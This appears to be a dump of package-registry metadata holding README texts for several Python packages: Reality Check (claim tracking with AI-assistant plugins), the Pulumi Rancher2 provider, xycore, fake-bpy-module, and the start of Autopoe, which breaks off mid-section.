rc-db claim get <id> # Get single claim (JSON)
rc-db claim list [--domain D] [--type T] [--format json|text]
rc-db claim update <id> --credence 0.9 [--notes "..."]
rc-db claim delete <id> # Delete a claim
# Source operations
rc-db source add --id "..." --title "..." --type "PAPER" --author "..." --year 2024
rc-db source get <id>
rc-db source list [--type T] [--status S]
# Chain operations (argument chains)
rc-db chain add --id "..." --name "..." --thesis "..." --claims "ID1,ID2,ID3"
rc-db chain get <id>
rc-db chain list
# Prediction operations
rc-db prediction add --claim-id "..." --source-id "..." --status "[P→]"
rc-db prediction list [--status S]
# Search and relationships
rc-db search "query" [--domain D] [--limit N]
rc-db related <claim-id> # Find related claims
# Evidence links (epistemic provenance)
rc-db evidence add --claim-id "..." --source-id "..." --direction supporting --strength strong
rc-db evidence get <id>
rc-db evidence list [--claim-id C] [--source-id S]
rc-db evidence supersede <id> --reason "..." [--new-location "..."]
# Reasoning trails (credence audit)
rc-db reasoning add --claim-id "..." --credence 0.8 --evidence-level E2 --reasoning-text "..."
rc-db reasoning get <id>
rc-db reasoning list [--claim-id C]
rc-db reasoning history <claim-id> # Full credence history
# Analysis audit logs
rc-db analysis start --source-id "..." # Begin tracking
rc-db analysis mark <stage> # Mark stage completion
rc-db analysis complete # Finalize log
rc-db analysis list # List audit logs
# Import/Export
rc-db import <file.yaml> --type claims|sources|all
rc-validate # Check database integrity
rc-export yaml claims -o claims.yaml # Export to YAML
```
## Claude Code Plugin
[Claude Code](https://github.com/anthropics/claude-code/) is Anthropic's AI coding assistant. Reality Check includes a plugin that adds slash commands for analysis workflows.
### Install the Plugin
```bash
# From the realitycheck repo directory:
make install-plugin-claude
```
**Note:** Local plugin discovery from `~/.claude/plugins/local/` is currently broken. Use the `--plugin-dir` flag:
```bash
# Start Claude Code with the plugin loaded:
claude --plugin-dir /path/to/realitycheck/integrations/claude/plugin
# Or create a shell alias:
alias claude-rc='claude --plugin-dir /path/to/realitycheck/integrations/claude/plugin'
```
### Plugin Commands
Commands are prefixed with `/reality:`:
| Command | Description |
|---------|-------------|
| `/reality:check <url>` | **Flagship** - Full analysis workflow (fetch → analyze → register → validate) |
| `/reality:synthesize <topic>` | Cross-source synthesis across multiple analyses |
| `/reality:analyze <source>` | Manual 3-stage analysis without auto-registration |
| `/reality:extract <source>` | Quick claim extraction |
| `/reality:search <query>` | Semantic search across claims |
| `/reality:validate` | Check database integrity |
| `/reality:export <format> <type>` | Export to YAML/Markdown |
| `/reality:stats` | Show database statistics |
### Alternative: Global Skills
If you prefer skills over plugins:
```bash
make install-skills-claude
```
This installs skills to `~/.claude/skills/` which are auto-activated based on context.
### Example Session
```
> /reality:check https://arxiv.org/abs/2401.00001
Claude will:
1. Fetch the paper content
2. Run 3-stage analysis (descriptive → evaluative → dialectical)
3. Extract and classify claims
4. Register source and claims in your database
5. Validate data integrity
6. Report summary with claim IDs
```
See `docs/PLUGIN.md` for full documentation.
## Codex Skills
Codex doesn’t support Claude-style plugins, but it does support “skills”.
Codex CLI reserves `/...` for built-in commands, so custom slash commands are not supported. Reality Check ships Codex skills you can invoke with `$...`:
- `$check ...`
- `$realitycheck ...` (including `$realitycheck data <path>` to target a DB for the current Codex session)
Embeddings are generated by default when registering sources/claims. Only set `REALITYCHECK_EMBED_SKIP=1` (or use `--no-embedding`) when you explicitly want to defer embeddings.
Install:
```bash
make install-skills-codex
```
See `integrations/codex/README.md` for usage and examples.
## Amp Skills
[Amp](https://ampcode.com) is Sourcegraph's AI coding assistant. Reality Check includes skills that activate on natural language triggers.
### Install Skills
```bash
make install-skills-amp
```
### Usage
Skills activate automatically based on natural language:
```
"Analyze this article for claims: https://example.com/article"
"Search for claims about AI automation"
"Validate the database"
"Show database stats"
```
See `integrations/amp/README.md` for full documentation.
## OpenCode Skills
[OpenCode](https://opencode.ai) is an open-source AI coding agent with 80K+ GitHub stars. Reality Check includes skills that integrate with OpenCode's skill system.
### Install Skills
```bash
make install-skills-opencode
```
### Usage
Skills are loaded on-demand via OpenCode's `skill` tool:
```
Load the realitycheck skill
```
Or reference skills in prompts:
```
Using the realitycheck-check skill, analyze https://example.com/article
```
### Available Skills
| Skill | Description |
|-------|-------------|
| `realitycheck` | Main entry point |
| `realitycheck-check` | Full analysis workflow |
| `realitycheck-search` | Semantic search |
| `realitycheck-validate` | Data validation |
| `realitycheck-stats` | Database statistics |
See `integrations/opencode/README.md` for full documentation.
## Keeping Integrations Updated
When you upgrade Reality Check, CLI/package code updates immediately, but integrations (skills/plugin symlinks) may still point at older locations.
Reality Check now performs a best-effort auto-sync on first `rc-*` command run after a version change. It updates existing Reality Check-managed installs without overwriting unrelated user files.
Manual sync command:
```bash
# Update integrations that already have at least one Reality Check install
rc-db integrations sync --install-missing
# Install/update all supported integrations (skills + Claude plugin)
rc-db integrations sync --all
```
Disable auto-sync:
```bash
export REALITYCHECK_AUTO_SYNC=0
```
## Taxonomy Reference
### Claim Types
| Type | Symbol | Definition |
|------|--------|------------|
| Fact | `[F]` | Empirically verified, consensus reality |
| Theory | `[T]` | Coherent framework with empirical support |
| Hypothesis | `[H]` | Testable proposition, awaiting evidence |
| Prediction | `[P]` | Future-oriented with specified conditions |
| Assumption | `[A]` | Underlying premise (stated or unstated) |
| Counterfactual | `[C]` | Alternative scenario for comparison |
| Speculation | `[S]` | Unfalsifiable or untestable claim |
| Contradiction | `[X]` | Identified logical inconsistency |
### Evidence Hierarchy
| Level | Strength | Description |
|-------|----------|-------------|
| E1 | Strong Empirical | Replicated studies, systematic reviews, meta-analyses |
| E2 | Moderate Empirical | Single peer-reviewed study, official statistics |
| E3 | Strong Theoretical | Expert consensus, working papers, preprints |
| E4 | Weak Theoretical | Industry reports, credible journalism |
| E5 | Opinion/Forecast | Personal observation, anecdote, expert opinion |
| E6 | Unsupported | Pure speculation, unfalsifiable claims |
### Domain Codes
| Domain | Code | Description |
|--------|------|-------------|
| Technology | `TECH` | AI capabilities, tech trajectories |
| Labor | `LABOR` | Employment, automation, work |
| Economics | `ECON` | Value, pricing, distribution |
| Governance | `GOV` | Policy, regulation, institutions |
| Social | `SOC` | Social structures, culture, behavior |
| Resource | `RESOURCE` | Scarcity, abundance, allocation |
| Transition | `TRANS` | Transition dynamics, pathways |
| Geopolitics | `GEO` | International relations, competition |
| Institutional | `INST` | Organizations, coordination |
| Risk | `RISK` | Risk assessment, failure modes |
| Meta | `META` | Claims about the framework itself |
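The taxonomy tables above can be enforced mechanically. A minimal sketch — hypothetical, not the actual `rc-db` schema — that rejects unknown type, evidence, or domain codes:

```python
from dataclasses import dataclass

CLAIM_TYPES = {"[F]", "[T]", "[H]", "[P]", "[A]", "[C]", "[S]", "[X]"}
EVIDENCE_LEVELS = {"E1", "E2", "E3", "E4", "E5", "E6"}
DOMAINS = {"TECH", "LABOR", "ECON", "GOV", "SOC", "RESOURCE",
           "TRANS", "GEO", "INST", "RISK", "META"}

@dataclass
class Claim:
    text: str
    claim_type: str      # one of CLAIM_TYPES, e.g. "[F]"
    domain: str          # one of DOMAINS, e.g. "TECH"
    evidence_level: str  # one of EVIDENCE_LEVELS, e.g. "E2"
    credence: float      # subjective probability in [0, 1]

    def __post_init__(self):
        if self.claim_type not in CLAIM_TYPES:
            raise ValueError(f"unknown claim type: {self.claim_type}")
        if self.domain not in DOMAINS:
            raise ValueError(f"unknown domain: {self.domain}")
        if self.evidence_level not in EVIDENCE_LEVELS:
            raise ValueError(f"unknown evidence level: {self.evidence_level}")
        if not 0.0 <= self.credence <= 1.0:
            raise ValueError("credence must be in [0, 1]")

claim = Claim("AI training costs double annually", "[F]", "TECH", "E2", 0.8)
```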
## Project Structure
```
realitycheck/ # Framework repo (this)
├── scripts/ # Python CLI tools
│ ├── db.py # Database operations + CLI
│ ├── validate.py # Data integrity checks
│ ├── export.py # YAML/Markdown export
│ ├── migrate.py # Legacy YAML migration
│ ├── embed.py # Embedding utilities (re-generate, status)
│ └── html_extract.py # HTML → {title, published, text} extraction
├── integrations/ # Tool integrations
│ ├── claude/ # Claude Code plugin + skills
│ ├── codex/ # OpenAI Codex skills
│ ├── amp/ # Amp skills
│ └── opencode/ # OpenCode skills
├── methodology/ # Analysis templates
│ ├── evidence-hierarchy.md
│ ├── claim-taxonomy.md
│ └── templates/
├── tests/ # pytest suite (454 tests)
└── docs/ # Documentation
my-research/ # Your data repo (separate)
├── .realitycheck.yaml # Project config
├── data/realitycheck.lance/ # LanceDB database
├── analysis/sources/ # Analysis documents
├── tracking/ # Prediction tracking
├── inbox/ # Sources to process (staging)
├── reference/primary/ # Filed primary documents
└── reference/captured/ # Supporting materials
```
## Why a Unified Knowledge Base?
Reality Check recommends **one knowledge base per user**, not per topic:
- Claims build on each other across domains (AI claims inform economics claims)
- Shared evidence hierarchy enables consistent evaluation
- Cross-domain synthesis becomes possible
- Semantic search works across your entire knowledge base
Create separate databases only for: organizational boundaries, privacy requirements, or team collaboration.
### Example Knowledge Base
See [realitycheck-data](https://github.com/lhl/realitycheck-data) for a public example knowledge base built with Reality Check, tracking claims across technology, economics, labor, and governance domains.
## Embedding Model
Reality Check uses `all-MiniLM-L6-v2` for semantic search embeddings. This model provides the best balance of performance and quality for CPU inference:
| Model | Dim | Load Time | Throughput | Memory |
|-------|-----|-----------|------------|--------|
| **all-MiniLM-L6-v2** | 384 | 2.9s | 7.8 q/s | 1.2 GB |
| all-mpnet-base-v2 | 768 | 3.0s | 3.3 q/s | 1.4 GB |
| granite-embedding-278m | 768 | 6.0s | 3.4 q/s | 2.5 GB |
| stella_en_400M_v5 | 1024 | 4.4s | 1.7 q/s | 2.7 GB |
The 384-dimension vectors are stored in LanceDB and used for similarity search across claims.
**Note:** Embeddings default to CPU to avoid GPU driver crashes. To use GPU:
```bash
export REALITYCHECK_EMBED_DEVICE="cuda" # or "mps" for Apple Silicon
```
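Semantic search over those 384-dimension vectors comes down to cosine similarity. LanceDB performs this natively; a stdlib-only sketch is shown here only to make the ranking step concrete:

```python
import math

def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(y * y for y in b))
    return dot / (na * nb)

def rank(query_vec, claims):
    """Return (claim_id, similarity) pairs, most similar first."""
    scored = [(cid, cosine(query_vec, vec)) for cid, vec in claims.items()]
    return sorted(scored, key=lambda p: p[1], reverse=True)

# Toy 3-d embeddings standing in for the real 384-d vectors
claims = {
    "TECH-2026-001": [0.9, 0.1, 0.0],
    "ECON-2026-002": [0.1, 0.9, 0.0],
}
print(rank([1.0, 0.0, 0.0], claims)[0][0])  # → TECH-2026-001
```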
## Development
```bash
# Run tests (skip slow embedding tests)
REALITYCHECK_EMBED_SKIP=1 uv run pytest -v
# Run all tests including embeddings
uv run pytest -v
# Run with coverage
uv run pytest --cov=scripts --cov-report=term-missing
```
## Development Stats Report
Generate `docs/STATUS-dev-stats.md` (per-tag development statistics) with:
```bash
python scripts/release_stats_rollup.py \
--repo-root . \
--with-scc \
--with-test-composition \
--output-json /tmp/realitycheck-release-stats.json \
--output-markdown docs/STATUS-dev-stats.md
```
This report includes:
- Release snapshot deltas vs prior release
- Velocity/cadence tables
- Cache-aware token and cost estimates for Codex + Claude
- Test composition and documentation churn
You can override pricing assumptions (including cached-token rates) with:
- `--price-gpt5-input-per-1m`
- `--price-gpt5-cached-input-per-1m`
- `--price-gpt5-output-per-1m`
- `--price-opus4-input-per-1m`
- `--price-opus4-cache-write-per-1m`
- `--price-opus4-cache-read-per-1m`
- `--price-opus4-output-per-1m`
See [CLAUDE.md](CLAUDE.md) for development workflow and contribution guidelines.
## Documentation
- [docs/PLUGIN.md](docs/PLUGIN.md) - Claude Code plugin guide
- [docs/SCHEMA.md](docs/SCHEMA.md) - Database schema reference
- [docs/WORKFLOWS.md](docs/WORKFLOWS.md) - Common usage workflows
- [docs/CHANGELOG.md](docs/CHANGELOG.md) - Release history and notes
- [methodology/](methodology/) - Analysis methodology and templates
## License
Apache 2.0
## Citation
If you use Reality Check in academic work, please cite the reference below;
`CITATION.cff` provides machine-readable citation metadata.
<!-- BEGIN REALITYCHECK_BIBTEX -->
```bibtex
@misc{lin2026realitycheck,
author = {Lin, Leonard},
title = {Reality Check},
year = {2026},
version = {0.3.3},
url = {https://github.com/lhl/realitycheck},
note = {Accessed: 2026-02-20}
}
```
<!-- END REALITYCHECK_BIBTEX -->
| text/markdown | null | Leonard Lin <lhl@lhl.org> | null | null | Apache-2.0 | analysis, claims, epistemics, lancedb, predictions, sources | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"beautifulsoup4>=4.12.0",
"lancedb>=0.18.0",
"pyarrow>=18.0.0",
"pyyaml>=6.0",
"sentence-transformers>=3.0.0",
"tabulate>=0.9.0",
"jinja2>=3.1.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"pytest>=8.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/lhl/realitycheck",
"Repository, https://github.com/lhl/realitycheck",
"Documentation, https://github.com/lhl/realitycheck/blob/main/README.md"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T06:44:59.286777 | realitycheck-0.3.3.tar.gz | 537,215 | 89/ff/89ad5a9c417e2b16e3cf0d624beb295667ea7d5381330ff9546171294c5d/realitycheck-0.3.3.tar.gz | source | sdist | null | false | f197ee643f999ad3596a5e8747e307fb | 43e6367c0324f5d15b66dc94d4a658fbad43679093c3d89ae79b754b842e893f | 89ff89ad5a9c417e2b16e3cf0d624beb295667ea7d5381330ff9546171294c5d | null | [
"LICENSE"
] | 230 |
2.4 | pulumi-rancher2 | 11.1.0a1771569264 | A Pulumi package for creating and managing rancher2 resources. | [](https://github.com/pulumi/pulumi-rancher2/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/rancher2)
[](https://pypi.org/project/pulumi-rancher2)
[](https://badge.fury.io/nu/pulumi.rancher2)
[](https://pkg.go.dev/github.com/pulumi/pulumi-rancher2/sdk/v11/go)
[](https://github.com/pulumi/pulumi-rancher2/blob/master/LICENSE)
# Rancher2 Resource Provider
The Rancher2 resource provider for Pulumi lets you manage Rancher2 resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/rancher2
or `yarn`:
$ yarn add @pulumi/rancher2
### Python
To use from Python, install using `pip`:
$ pip install pulumi_rancher2
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-rancher2/sdk/v11
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Rancher2
## Configuration
The following configuration points are available for the `rancher2` provider:
- `rancher2:apiUrl` (Required) - The URL of the Rancher API. It must be provided, but it can also be sourced from the
`RANCHER_URL` environment variable.
- `rancher2:accessKey` (Optional) - API key used to authenticate with the Rancher server. It can also be sourced from the
`RANCHER_ACCESS_KEY` environment variable.
- `rancher2:secretKey` (Optional) - API secret used to authenticate with the Rancher server. It can also be sourced from
the `RANCHER_SECRET_KEY` environment variable.
- `rancher2:tokenKey` (Optional) - API token used to authenticate with the Rancher server. It can also be sourced from
the `RANCHER_TOKEN_KEY` environment variable.
- `rancher2:caCerts` (Optional) - CA certificates used to sign the Rancher server's TLS certificates. Mandatory if TLS is
self-signed and the insecure option is false. It can also be sourced from the `RANCHER_CA_CERTS` environment variable.
- `rancher2:bootstrap` (Optional) - Bootstrap the Rancher server. Default value is `false`. It can also be sourced from the
`RANCHER_BOOTSTRAP` environment variable.
- `rancher2:insecure` (Optional) - Allow insecure connections to Rancher. Mandatory if TLS is self-signed and no caCerts
are provided. Default value is `false`. It can also be sourced from the `RANCHER_INSECURE` environment variable.
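Each setting resolves to an explicit config value first, then falls back to its environment variable. That resolution order can be sketched as follows (illustrative only — not the provider's actual implementation):

```python
import os

def resolve(config, key, env_var, default=None):
    """Explicit config value wins; otherwise fall back to the environment."""
    if key in config:
        return config[key]
    return os.environ.get(env_var, default)

os.environ["RANCHER_URL"] = "https://rancher.example.com/v3"
print(resolve({}, "rancher2:apiUrl", "RANCHER_URL"))  # → https://rancher.example.com/v3
```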
## Reference
For further information, please visit [the Rancher2 provider docs](https://www.pulumi.com/docs/intro/cloud-providers/rancher2) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/rancher2).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, rancher2 | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-rancher2"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:44:48.455537 | pulumi_rancher2-11.1.0a1771569264.tar.gz | 361,798 | f1/50/df87eea903209317804cb070e4f65b0344c0f47ff31ca1f35ba966354047/pulumi_rancher2-11.1.0a1771569264.tar.gz | source | sdist | null | false | 25358ecf7df03b4f00522f4ef6e00ab7 | 8027d1c53ff416c2d21bca887d7d8672aa53344fcab6cfe36f139c8e5374b1ee | f150df87eea903209317804cb070e4f65b0344c0f47ff31ca1f35ba966354047 | null | [] | 209 |
2.4 | xycore | 1.0.2 | The XY primitive — cryptographic verification for any system. | # xycore
[](https://pypi.org/project/xycore/)
[](https://pypi.org/project/xycore/)
[](LICENSE)
The zero-dependency cryptographic protocol for proving state transitions.
X is state before. Y is state after. XY is proof the transition
happened. Chain them. Anyone can verify.
Not a blockchain. Not a database. Not a logging framework.
A standalone protocol — the cryptographic core, extracted,
with nothing else attached.
## Install
```bash
pip install xycore
```
## Usage
```python
from xycore import XYChain

chain = XYChain(name="my-chain")
chain.append("deploy",
    x_state={"version": "1.0"},
    y_state={"version": "1.1"}
)
chain.append("configure",
    x_state={"version": "1.1"},
    y_state={"version": "1.1", "configured": True}
)

valid, break_index = chain.verify()
assert valid
```
## Properties
- Zero dependencies. Standard library only.
- Works offline. Works without an account. Works forever.
- Anyone can implement against this spec in any language.
- Anyone can verify a chain independently — no trust required.
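The chain-and-verify idea can be sketched with the standard library alone. This is a conceptual illustration of hash chaining, not xycore's actual record format or wire protocol:
```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder hash for the first record's predecessor

def record_hash(prev_hash, action, x_state, y_state):
    """Hash one transition record together with the previous record's hash."""
    payload = json.dumps(
        {"prev": prev_hash, "action": action, "x": x_state, "y": y_state},
        sort_keys=True,
    )
    return hashlib.sha256(payload.encode()).hexdigest()

def build_chain(transitions):
    """Return a list of (record, hash) pairs, each hash covering its predecessor."""
    chain, prev = [], GENESIS
    for action, x, y in transitions:
        h = record_hash(prev, action, x, y)
        chain.append(((action, x, y), h))
        prev = h
    return chain

def verify(chain):
    """Recompute every hash; return (True, None) or (False, first_bad_index)."""
    prev = GENESIS
    for i, ((action, x, y), h) in enumerate(chain):
        if record_hash(prev, action, x, y) != h:
            return False, i
        prev = h
    return True, None

chain = build_chain([
    ("deploy",    {"version": "1.0"}, {"version": "1.1"}),
    ("configure", {"version": "1.1"}, {"version": "1.1", "configured": True}),
])
assert verify(chain) == (True, None)

# Tamper with the first record's y_state: verification pinpoints the break.
(action, x, _y), h = chain[0]
chain[0] = ((action, x, {"version": "9.9"}), h)
assert verify(chain) == (False, 0)
```
Because each hash covers its predecessor, tampering with any record invalidates every later hash, so verification can report the first broken index.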
## Signatures (optional)
```bash
pip install "xycore[signatures]"
```
## pruv
pruv is the verification layer built on xycore.
https://pruv.dev
| text/markdown | null | null | null | null | MIT | null | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Security :: Cryptography",
"Topic :: Software Development :: Libraries",
"Typing :: Typed"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"cryptography>=41.0; extra == \"signatures\""
] | [] | [] | [] | [
"Homepage, https://pruv.dev",
"Documentation, https://docs.pruv.dev",
"Repository, https://github.com/mintingpressbuilds/pruv"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T06:44:35.655666 | xycore-1.0.2.tar.gz | 19,032 | bd/2f/03480345fa7580275f72bd11a87a85ea16ecca1a0272b2720ed277b827c1/xycore-1.0.2.tar.gz | source | sdist | null | false | d65a5cea112f24f2265225fbbdc976f6 | b5ad31f25c6944a6f2cedba7e18b3d0a1f2aaca6db112008eff925db2b59ee72 | bd2f03480345fa7580275f72bd11a87a85ea16ecca1a0272b2720ed277b827c1 | null | [
"LICENSE"
] | 236 |
2.4 | fake-bpy-module | 20260220 | Collection of the fake Blender Python API module for the code completion. | # Fake Blender Python API module collection: fake-bpy-module
fake-bpy-module is a collection of fake Blender Python API modules that enable
code completion in commonly used IDEs.
Note: A similar project for the Blender Game Engine (BGE) is available at
[fake-bge-module](https://github.com/nutti/fake-bge-module), which targets
[UPBGE](https://upbge.org/).

*Your support helps ensure the long-term maintenance of this project.*
*You can support its development via*
**[GitHub Sponsors](https://github.com/sponsors/nutti)**.
*See [the contribution document](CONTRIBUTING.md) for details on*
*how to support it.*
## Requirements
fake-bpy-module uses the `typing` module and type hints available from
Python 3.8. Make sure your Python version is >= 3.8.
## Install
fake-bpy-module can be installed via a pip package, or pre-generated modules.
You can also generate and install modules manually.
### Install via pip package
fake-bpy-module is registered to PyPI.
You can install it as a pip package.
#### Install the latest package
To install fake-bpy-module for the latest Blender build (a main-branch daily
build powered by [nutti/blender-daily-build](https://github.com/nutti/blender-daily-build)),
run the command below.
```sh
pip install fake-bpy-module
```
or, specify version "latest".
```sh
pip install fake-bpy-module-latest
```
#### Install a version-specific package
To install a version-specific package, run the command below.
```sh
pip install fake-bpy-module-<version>
```
For example, to install fake-bpy-module for Blender 2.93, run the command below.
```sh
pip install fake-bpy-module-2.93
```
*Note: PyCharm users should change the value of `idea.max.intellisense.filesize` in
the `idea.properties` file to more than 2600, because some modules are too big
for IntelliSense to handle by default.*
##### Supported Blender Version
|Version|PyPI|
|---|---|
|2.78|[https://pypi.org/project/fake-bpy-module-2.78/](https://pypi.org/project/fake-bpy-module-2.78/)|
|2.79|[https://pypi.org/project/fake-bpy-module-2.79/](https://pypi.org/project/fake-bpy-module-2.79/)|
|2.80|[https://pypi.org/project/fake-bpy-module-2.80/](https://pypi.org/project/fake-bpy-module-2.80/)|
|2.81|[https://pypi.org/project/fake-bpy-module-2.81/](https://pypi.org/project/fake-bpy-module-2.81/)|
|2.82|[https://pypi.org/project/fake-bpy-module-2.82/](https://pypi.org/project/fake-bpy-module-2.82/)|
|2.83|[https://pypi.org/project/fake-bpy-module-2.83/](https://pypi.org/project/fake-bpy-module-2.83/)|
|2.90|[https://pypi.org/project/fake-bpy-module-2.90/](https://pypi.org/project/fake-bpy-module-2.90/)|
|2.91|[https://pypi.org/project/fake-bpy-module-2.91/](https://pypi.org/project/fake-bpy-module-2.91/)|
|2.92|[https://pypi.org/project/fake-bpy-module-2.92/](https://pypi.org/project/fake-bpy-module-2.92/)|
|2.93|[https://pypi.org/project/fake-bpy-module-2.93/](https://pypi.org/project/fake-bpy-module-2.93/)|
|3.0|[https://pypi.org/project/fake-bpy-module-3.0/](https://pypi.org/project/fake-bpy-module-3.0/)|
|3.1|[https://pypi.org/project/fake-bpy-module-3.1/](https://pypi.org/project/fake-bpy-module-3.1/)|
|3.2|[https://pypi.org/project/fake-bpy-module-3.2/](https://pypi.org/project/fake-bpy-module-3.2/)|
|3.3|[https://pypi.org/project/fake-bpy-module-3.3/](https://pypi.org/project/fake-bpy-module-3.3/)|
|3.4|[https://pypi.org/project/fake-bpy-module-3.4/](https://pypi.org/project/fake-bpy-module-3.4/)|
|3.5|[https://pypi.org/project/fake-bpy-module-3.5/](https://pypi.org/project/fake-bpy-module-3.5/)|
|3.6|[https://pypi.org/project/fake-bpy-module-3.6/](https://pypi.org/project/fake-bpy-module-3.6/)|
|4.0|[https://pypi.org/project/fake-bpy-module-4.0/](https://pypi.org/project/fake-bpy-module-4.0/)|
|4.1|[https://pypi.org/project/fake-bpy-module-4.1/](https://pypi.org/project/fake-bpy-module-4.1/)|
|4.2|[https://pypi.org/project/fake-bpy-module-4.2/](https://pypi.org/project/fake-bpy-module-4.2/)|
|4.3|[https://pypi.org/project/fake-bpy-module-4.3/](https://pypi.org/project/fake-bpy-module-4.3/)|
|4.4|[https://pypi.org/project/fake-bpy-module-4.4/](https://pypi.org/project/fake-bpy-module-4.4/)|
|4.5|[https://pypi.org/project/fake-bpy-module-4.5/](https://pypi.org/project/fake-bpy-module-4.5/)|
|5.0|[https://pypi.org/project/fake-bpy-module-5.0/](https://pypi.org/project/fake-bpy-module-5.0/)|
|latest|[https://pypi.org/project/fake-bpy-module/](https://pypi.org/project/fake-bpy-module/)|
||[https://pypi.org/project/fake-bpy-module-latest/](https://pypi.org/project/fake-bpy-module-latest/)|
### Install via pre-generated modules
Download pre-generated modules from the [Release page](https://github.com/nutti/fake-bpy-module/releases).
The installation process for pre-generated modules differs by IDE.
See the following guides for details.
* [PyCharm](docs/setup_pycharm.md)
* [Visual Studio Code](docs/setup_visual_studio_code.md)
* [All Text Editor (Install as Python module)](docs/setup_all_text_editor.md)
### Generate Modules Manually
You can also generate modules manually.
See [Generate Module](docs/generate_modules.md) for details.
## Change Log
See [CHANGELOG.md](CHANGELOG.md)
## Bug Reports / Feature Requests / Discussions
To report a bug, request a feature, or discuss this project, see
[ISSUES.md](ISSUES.md).
[fake-bpy-module channel](https://discord.gg/dGU9et5S2d) is
available on the Discord server.
Timely discussions and release announcements about fake-bpy-module are
made in this channel.
## Contribution
If you want to contribute to this project, see [CONTRIBUTING.md](CONTRIBUTING.md).
## Project Authors
### Owner
[**@nutti**](https://github.com/nutti)
Indie Game/Application Developer.
I spend most of my time improving Blender and Unreal Engine by
providing extensions.
Support via [GitHub Sponsors](https://github.com/sponsors/nutti)
* CONTACTS: [Twitter](https://twitter.com/nutti__)
* WEBSITE: [Japanese Only](https://colorful-pico.net/)
### Contributors
* [**@grische**](https://github.com/grische)
* [**@echantry**](https://github.com/echantry)
* [**@kant**](https://github.com/kant)
* [**@theoryshaw**](https://github.com/theoryshaw)
* [**@espiondev**](https://github.com/espiondev)
* [**@JonathanPlasse**](https://github.com/JonathanPlasse)
* [**@UuuNyaa**](https://github.com/UuuNyaa)
* [**@Road-hog123**](https://github.com/Road-hog123)
* [**@Andrej730**](https://github.com/Andrej730)
* [**@ice3**](https://github.com/ice3)
* [**@almarouk**](https://github.com/almarouk)
* [**@UnknownLITE**](https://github.com/UnknownLITE)
* [**@emmanuel-ferdman**](https://github.com/emmanuel-ferdman)
| text/markdown | nutti | nutti.metro@gmail.com | nutti | nutti.metro@gmail.com | null | null | [
"Topic :: Multimedia :: Graphics :: 3D Modeling",
"Topic :: Multimedia :: Graphics :: 3D Rendering",
"Topic :: Text Editors :: Integrated Development Environments (IDE)",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License"
] | [
"Windows"
] | null | null | >=3.8 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/nutti/fake-bpy-module",
"Documentation, https://github.com/nutti/fake-bpy-module/blob/main/README.md",
"Source, https://github.com/nutti/fake-bpy-module",
"Download, https://github.com/nutti/fake-bpy-module/releases",
"Bug Tracker, https://github.com/nutti/fake-bpy-module/issues",
"Release Notes, https://github.com/nutti/fake-bpy-module/blob/main/CHANGELOG.md"
] | twine/6.1.0 CPython/3.8.20 | 2026-02-20T06:44:18.914390 | fake_bpy_module-20260220.tar.gz | 966,767 | 65/26/708b316bae17afc3e2835f107ee416dcf66825faf0a8add9f358a2085014/fake_bpy_module-20260220.tar.gz | source | sdist | null | false | bd7f3a41882d676212face718864563b | cfcb1aaf0e81fad439cae351dad50cb0b654b06f6adce97182fd8b2165cd924e | 6526708b316bae17afc3e2835f107ee416dcf66825faf0a8add9f358a2085014 | null | [] | 624 |
2.4 | autopoe | 0.2.3 | A structured multi-agent framework for coordinated AI collaboration | # Autopoe
A multi-agent collaboration framework where lightweight AI agents work together through structured coordination to accomplish complex software development tasks.
## Installation
Pick one:
```bash
uvx autopoe # run without installing
uv tool install autopoe # install via uv
pip install autopoe # install via pip
```
To run from source, see [Development](#development).
## Prerequisites
- **[Firejail](https://github.com/netblue30/firejail)** — required for agents to execute shell commands in a sandboxed environment. Install it before running Autopoe if you want agents to be able to run code.
## Configuration
On first run, configure your LLM provider via the Settings panel (gear icon). Three API types are supported — any compatible endpoint works:
- **OpenAI-compatible** — OpenRouter, Ollama, ModelScope, vLLM, LiteLLM, or any `/v1/chat/completions` endpoint
- **Anthropic** — any endpoint following the Anthropic Messages API
- **Google Gemini** — any endpoint following the Gemini `generateContent` API
Settings are saved to `settings.json` and can be changed at runtime without restarting.
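As a rough sketch of what those three wire formats look like, here are the request-body shapes from the public API docs (these helper functions are illustrative, not part of Autopoe):
```python
def openai_payload(model: str, prompt: str) -> dict:
    # Body for a POST to an OpenAI-compatible /v1/chat/completions endpoint
    return {"model": model, "messages": [{"role": "user", "content": prompt}]}

def anthropic_payload(model: str, prompt: str) -> dict:
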